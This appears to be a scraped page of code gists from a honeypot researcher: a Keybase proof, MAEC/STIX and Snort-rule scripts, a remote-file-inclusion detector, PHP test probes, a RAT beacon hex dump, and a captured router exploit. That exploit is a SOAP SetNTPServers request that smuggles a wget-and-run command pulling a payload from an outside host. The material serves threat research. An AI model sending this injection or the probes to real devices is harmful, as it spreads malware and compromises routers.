I hereby claim:
- I am glaslos on github.
- I am glaslos (https://keybase.io/glaslos) on keybase.
- I have a public key whose fingerprint is D099 0BD3 2653 363D 4EB0 4DA3 63D2 3785 3EDE 7A61
To claim this, I am signing this object:
.. |landscape| image:: https://landscape.io/github/glastopf/conpot/master/landscape.png
   :target: https://landscape.io/github/glastopf/conpot/master
   :alt: Code Health
from lxml import etree | |
from maec.package.package import Package | |
from stix.extensions.malware.maec_4_1_malware import MAECInstance | |
# Default-constructed MAEC package and the STIX MAECInstance that will carry it.
malware_package = Package()
maec_malware_instance = MAECInstance()

# Serialise the package, then re-parse it with lxml's ElementTree-compatible
# parser so that the instance's `maec` attribute holds an lxml element.
# NOTE(review): the XML parsed here is produced locally by to_xml(), not taken
# from an external source. lxml parsers resolve entities by default, so pass
# resolve_entities=False to the parser before reusing this pattern on
# untrusted XML.
package_xml = malware_package.to_xml()
compat_parser = etree.ETCompatXMLParser()
maec_malware_instance.maec = etree.fromstring(package_xml, parser=compat_parser)
I hereby claim:
To claim this, I am signing this object:
import requests | |
rule_count = 0 | |
http_rule_count = 0 | |
r = requests.get("http://rules.emergingthreats.net/open-nogpl/snort-edge/rules/emerging-trojan.rules") | |
for line in r.text.split("\n"): | |
if line.strip() == "#": | |
rule_count += 1 | |
elif "$HTTP_PORTS" in line: |
import SimpleHTTPServer | |
import SocketServer | |
paths = set() | |
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
def do_GET(self): | |
# Detect remote file inclusion | |
if '=http' in self.path: |
import sys | |
import tty | |
import termios | |
fd = sys.stdin.fileno() | |
# keep original terminal settings | |
old_settings = termios.tcgetattr(fd) | |
<?php | |
system("uname -a"); | |
?> |
<?php echo("test successful"); ?> |
<?xml version="1.0"?> | |
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> | |
<SOAP-ENV:Body> | |
<u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> | |
<NewNTPServer1>`cd /var/tmp;cd /tmp;wget http://glzfk.pw:8080/a;sh a`</NewNTPServer1> | |
<NewNTPServer2/> | |
<NewNTPServer3/> | |
<NewNTPServer4/> | |
<NewNTPServer5/> | |
</u:SetNTPServers> |
00000000 6c 76 7c 27 7c 27 7c 56 48 4a 76 61 6d 46 75 58 |lv|'|'|VHJvamFuX| | |
00000010 30 4d 30 4e 6b 59 32 52 54 6b 3d 7c 27 7c 27 7c |0M0NkY2RTk=|'|'|| | |
00000020 4d 41 52 4b 7c 27 7c 27 7c 75 73 65 72 7c 27 7c |MARK|'|'|user|'|| | |
00000030 27 7c 32 30 31 33 2d 31 31 2d 32 32 7c 27 7c 27 |'|2013-11-22|'|'| | |
00000040 7c 7c 27 7c 27 7c 57 69 6e 20 58 50 7c 27 7c 27 |||'|'|Win XP|'|'| | |
00000050 7c 4e 6f 7c 27 7c 27 7c 30 2e 36 2e 34 7c 27 7c ||No|'|'|0.6.4|'|| | |
00000060 27 7c 2e 2e 7c 27 7c 27 7c 7c 27 7c 27 7c 5b 65 |'|..|'|'||'|'|[e| | |
00000070 6e 64 6f 66 5d |ndof]| | |
>>> base64.b64decode("VHJvamFuX0M0NkY2RTk=") |